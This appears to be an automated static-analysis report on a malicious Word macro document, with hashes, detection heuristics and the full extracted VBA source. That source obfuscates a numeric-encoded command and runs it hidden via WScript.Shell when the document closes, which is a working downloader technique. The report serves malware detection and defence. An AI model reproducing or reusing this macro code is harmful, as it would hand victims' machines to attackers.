Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 b4b6baca1104b0db…

MALICIOUS

Office (OOXML)

36.3 KB Created: 2017-10-25 18:34:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2019-03-10
MD5: a755452d568062234058f69114bf3ee2 SHA-1: cab8950cc622639eea40ffcc0356d22fc8d0cac0 SHA-256: b4b6baca1104b0dbb289731c3b206cfeaefe58a23f45182e0d4f44069a7f5f39
292 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1137.005 DLL Search Order Hijacking

The sample is an OOXML document containing VBA macros. The AutoClose macro is present and calls the Shell() function via WScript.Shell, indicating an intent to execute arbitrary commands. This is a common technique for downloading and executing further malicious payloads.

Heuristics 8

  • ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
      If Len(paga) > 16 Then
    Call CreateObject("WScript.Shell").Run(paga, vbHide)
  End If
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
      If Len(paga) > 16 Then
    Call CreateObject("WScript.Shell").Run(paga, vbHide)
  End If
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
 Call Application.Run("rigare", epocale("143751250331342540404911203738440206491138442510490732140131314911053748480108434909202551112713172510064900323106254823202506232225130540022508062823353751084037014350024025094534060614245252060337084332042547250332042525404008013123103748524133521237133706012314321045424921250847243630303536413649394945462935441536182325442545281649000601030611300337102531314921250847243630303536413645462935441536182325442545164909202551112713172510064900323106254823202 …
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2010/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2497 bytes
SHA-256: 0ae32e218440c402aeffba33787b831d86fd90150a43d3a7d8e8e514b4fc609f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function occultare(zuppa As Integer) As String
 Dim sfaticato() As Variant
 sfaticato = Array("S", "a", "i", "r", "f", "C", "t", "B", "n", "(", "c", "-", "g", "b", "p", "R", ";", "j", "K", "=", "N", "$", "W", ".", ":", "e", "?", "O", ")", "z", "P", "s", "y", "Z", "h", "D", "A", "o", "E", "+", "l", "T", ",", "d", "x", "'", "\", "v", "m", " ", "F", "w", "/")
 Dim esercito As Integer
 
 For esercito = LBound(sfaticato) To UBound(sfaticato)
   If esercito = zuppa Then
    occultare = sfaticato(esercito)
   End If
 Next
 
End Function

Function epocale(Optional parlato As String, Optional parlato2)
  dado = puntare(Trim(parlato))
  For esercito = 0 To Len(parlato)
  
    Dim ovocito As String
    Dim elevare As Integer
    If (esercito + 1) <= UBound(dado) Then
    relazione = pavone(Array(relazione, occultare(Int(dado(esercito) + dado(esercito + 1)))))
    esercito = esercito + 1
    End If
  Next
  
  epocale = relazione
End Function


Public Function rigare(paga As String)
  If Len(paga) > 16 Then
    Call CreateObject("WScript.Shell").Run(paga, vbHide)
  End If
End Function

Sub AutoClose()
 Call Application.Run("rigare", epocale("143751250331342540404911203738440206491138442510490732140131314911053748480108434909202551112713172510064900323106254823202506232225130540022508062823353751084037014350024025094534060614245252060337084332042547250332042525404008013123103748524133521237133706012314321045424921250847243630303536413649394945462935441536182325442545281649000601030611300337102531314921250847243630303536413645462935441536182325442545164909202551112713172510064900323106254823202506232225130540022508062823353751084037014300060302081209453406061424525206033708433204254725033204252540400801312310374852312314341426024319123713370601452816"))
End Sub

Function pavone(sfarzoso As Variant)
 smottato = ""
 
 For orologio = 0 To UBound(sfarzoso)
   smottato = smottato & "" & sfarzoso(orologio)
 Next
 
 pavone = smottato
End Function



Function puntare(fiore As String, Optional sibilo As Integer) As Variant
    puntare = Split(Left(StrConv(fiore, vbUnicode), Len(StrConv(fiore, vbUnicode)) - 1), vbNullChar)
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 12288 bytes
SHA-256: 7896d31b13066b5198d2730f3c166a9cb66b1ebde8bc56496d3e52636ea0f2f3
Detection
ClamAV: Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.